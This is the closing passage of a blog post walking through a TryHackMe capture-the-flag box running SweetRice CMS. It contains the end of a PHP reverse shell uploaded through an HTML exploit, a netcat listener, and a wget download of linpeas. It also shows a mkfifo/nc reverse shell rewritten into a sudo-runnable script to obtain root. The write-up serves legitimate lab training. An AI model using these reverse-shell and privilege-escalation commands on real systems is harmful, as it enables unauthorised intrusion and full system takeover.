</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">in_array</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">$</span><span class="n">read_a</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">$</span><span class="n">debug</span><span class="p">)</span> <span class="n">printit</span><span class="p">(</span><span class="s2">&#34;STDOUT READ&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="o">$</span><span class="n">input</span> <span class="o">=</span> <span class="n">fread</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="o">$</span><span class="n">chunk_size</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">$</span><span class="n">debug</span><span class="p">)</span> <span class="n">printit</span><span class="p">(</span><span class="s2">&#34;STDOUT: $input&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="n">fwrite</span><span class="p">(</span><span class="o">$</span><span class="n">sock</span><span class="p">,</span> <span class="o">$</span><span class="n">input</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">If</span> <span class="n">we</span> <span class="n">can</span> <span class="n">read</span> <span class="n">from</span> <span class="n">the</span> <span class="n">process</span><span class="s1">&#39;s STDERR</span>
</span></span><span class="line"><span class="cl">	<span class="o">//</span> <span class="n">send</span> <span class="n">data</span> <span class="n">down</span> <span class="n">tcp</span> <span class="n">connection</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">in_array</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">$</span><span class="n">read_a</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">$</span><span class="n">debug</span><span class="p">)</span> <span class="n">printit</span><span class="p">(</span><span class="s2">&#34;STDERR READ&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="o">$</span><span class="n">input</span> <span class="o">=</span> <span class="n">fread</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">$</span><span class="n">chunk_size</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">$</span><span class="n">debug</span><span class="p">)</span> <span class="n">printit</span><span class="p">(</span><span class="s2">&#34;STDERR: $input&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="n">fwrite</span><span class="p">(</span><span class="o">$</span><span class="n">sock</span><span class="p">,</span> <span class="o">$</span><span class="n">input</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="n">fclose</span><span class="p">(</span><span class="o">$</span><span class="n">sock</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="n">fclose</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">0</span><span class="p">]);</span>
</span></span><span class="line"><span class="cl"><span class="n">fclose</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">1</span><span class="p">]);</span>
</span></span><span class="line"><span class="cl"><span class="n">fclose</span><span class="p">(</span><span class="o">$</span><span class="n">pipes</span><span class="p">[</span><span class="mi">2</span><span class="p">]);</span>
</span></span><span class="line"><span class="cl"><span class="n">proc_close</span><span class="p">(</span><span class="o">$</span><span class="n">process</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="n">Like</span> <span class="nb">print</span><span class="p">,</span> <span class="n">but</span> <span class="n">does</span> <span class="n">nothing</span> <span class="k">if</span> <span class="n">we</span><span class="s1">&#39;ve daemonised ourself</span>
</span></span><span class="line"><span class="cl"><span class="o">//</span> <span class="p">(</span><span class="n">I</span> <span class="n">can</span><span class="s1">&#39;t figure out how to redirect STDOUT like a proper daemon)</span>
</span></span><span class="line"><span class="cl"><span class="n">function</span> <span class="n">printit</span> <span class="p">(</span><span class="o">$</span><span class="n">string</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!$</span><span class="n">daemon</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="nb">print</span> <span class="s2">&#34;$string</span><span class="se">\n</span><span class="s2">&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="err">?</span><span class="o">&gt;</span> 
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">&lt;/</span><span class="n">textarea</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;/</span><span class="n">form</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;/</span><span class="n">body</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;/</span><span class="n">html</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="o">&lt;!--</span>
</span></span><span class="line"><span class="cl"><span class="c1"># After HTML File Executed You Can Access Page In</span>
</span></span><span class="line"><span class="cl"><span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">localhost</span><span class="o">/</span><span class="n">sweetrice</span><span class="o">/</span><span class="n">inc</span><span class="o">/</span><span class="n">ads</span><span class="o">/</span><span class="n">hacked</span><span class="o">.</span><span class="n">php</span>
</span></span><span class="line"><span class="cl">  <span class="o">--&gt;</span>
</span></span></code></pre></div><p>Lets prep to listen with netcat and listen for an incoming connection. Remember the port you listed in the php reverse shell is the port you want to listen on.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">nc -lvnp 9001
</span></span></code></pre></div><p>We are ready. Let&rsquo;s see if we can get this thing to connect to us. We are going to run the html file again</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">firefox exploit.html
</span></span></code></pre></div><p>You should notice something if you are still logged in to the website management site.
<figure><img src="/images/Posts/009/revshell.jpg"/>
</figure>
</p>
<p>That means that the proof of concept is still working. Let&rsquo;s navigate to the page and execute this.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">http://10.10.111.161/content/inc/ads/revshell.php
</span></span></code></pre></div><p>Remember following along with john we arent using hacked.php for this but we are using revshell.php. Take a look at your netcat listener and you should now see the prompt of <code>$ www-data</code>. Hacker voice on &ldquo;IM IN&rdquo;.</p>
<h2 id="find-the-loot">Find the Loot</h2>
<p>Now that we have a reverse shell lets stabilize the shell. John gave an awesome resource for this in his video of <a href="https://netsec.ws/?p=337">netsec</a>. Let&rsquo;s go ahead and do this. You can use the method John used in his video, which is new to me.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">/usr/bin/script -qc /bin/bash /dev/null
</span></span></code></pre></div><p>Alright we have a TTY shell now. Let&rsquo;s see about using OSCP&rsquo;s favorite tool <a href="https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite">linpeas</a>. One common way I&rsquo;ve seen it is to run a http server with python on your host box and <code>wget</code> the file on your target machine. Navigate to where your <code>linpeas.sh</code> file is and fire up the python server.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">python3 -m http.server 80
</span></span></code></pre></div><p>That will start your websever. Now lets get that precious linpeas file.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">wget 10.2.40.5/linpeas.sh
</span></span></code></pre></div><p>We will need to make that executeable so.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">chmod +x linpeas.sh
</span></span></code></pre></div><p>Simple enough now lets run it.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">./linpeas.sh
</span></span></code></pre></div><p>This colorful output is just awesome. Remember that red is your friend.</p>
<p>Linpeas points out that you can run sudo on a file in the <code>/home/itguy</code> directory so lets go over to that directory and look.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">cd /home/itguy
</span></span></code></pre></div><p>When you type <code>ls</code> in the directory you get a nice gift of a user.txt file. Claim your flag.</p>
<p>Now we need to look up that <code>backup.pl</code> file because we can run that as sudo with no password. Thank you linpeas.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">cat backup.pl
</span></span></code></pre></div><p>This is a pearl file that runs a shell on <code>/etc/copy.sh</code></p>
<p>Lets take a look at that file now.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">cat /etc/copy.sh
</span></span></code></pre></div><p>Alright we are greeted with.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 192.168.0.190 5554 &gt;/tmp/
</span></span></code></pre></div><p>A reverse shell inside a reverse shell. This is revshellception. Lets make this our own, so we can get an elevated reverse shell. We will have to choose a different port, so I chose port 9100.</p>
<p>I had an issue with trying to fire up nano like John did in his video so I took a different approach. Since I can still write to it, and I am not trying to preserve any information I just used <code>echo</code>.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">echo &#34;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2&gt;&amp;1|nc 10.2.40.5 9100 &gt;/tmp/f&#34; &gt; /etc/copy.sh
</span></span></code></pre></div><p>Make sure your IP and port is correct by using cat.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">cat /etc/copy.sh
</span></span></code></pre></div><p>You should see your information now. Lets take that linpeas information to run sudo on the pearl script without using a password.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">sudo /usr/bin/perl /home/itguy/backup.pl
</span></span></code></pre></div><p>Jump for JOY! We now have a root shell. Lets go get our loot. <code>cd</code> into the <code>/root</code> directory to see the string of text that you have been hunting for.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">cat root.txt
</span></span></code></pre></div><p>Get your flag and free.</p>
<p>This was an amazing learning experience, and there is no way I would of got here on my own without watching the walk through video. Thank you for putting out great content John Hammond. If you would like to follow along the video please see below. Make sure to stop by John&rsquo;s <a href="(https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw)">YouTube</a> channel and subscribe.</p>
<hr>
<h3 id="youtube-walkthrough">Youtube Walkthrough</h3>

<div style="position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;">
  <iframe src="https://www.youtube.com/embed/qDLtEP58bao" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;" allowfullscreen title="YouTube Video"></iframe>
</div>



  <h3>Related Posts</h3>
  <ul>
    
      <li><a href="/post/try-hack-me-rootme/">Try Hack Me RootMe</a></li>
    
      <li><a href="/post/thm-pickle-rick/">THM Pickle Rick</a></li>
    
      <li><a href="/post/cyber-apocalypse_kryptos/">Cyber Apocalypse 2022 - Kryptos Support</a></li>
    
  </ul>

</div>
    <div class="post__footer">
      
        <span><a class="category" href="/categories/ethical-hacking/">Ethical Hacking</a><a class="category" href="/categories/ctf/">CTF</a><a class="category" href="/categories/tryhackme/">TryHackMe</a><a class="category" href="/categories/linux/">Linux</a><a class="category" href="/categories/pentesting/">Pentesting</a></span>


      

      
        <span><a class="tag" href="/tags/thm/">THM</a><a class="tag" href="/tags/ctf/">CTF</a><a class="tag" href="/tags/php/">PHP</a><a class="tag" href="/tags/linpeas/">Linpeas</a></span>


      
    </div>

    
  </div>

      </main>
    </div><footer class="footer footer__base">
  <ul class="footer__list">
    <li class="footer__item">
      &copy;
      
        2020-2025
      
    </li>
    
  </ul>
</footer>
  
  <script
    type="text/javascript"
    src="/js/medium-zoom.min.1248fa75275e5ef0cbef27e8c1e27dc507c445ae3a2c7d2ed0be0809555dac64.js"
    integrity="sha256-Ekj6dSdeXvDL7yfoweJ9xQfERa46LH0u0L4ICVVdrGQ="
    crossorigin="anonymous"
  ></script></body>
</html>
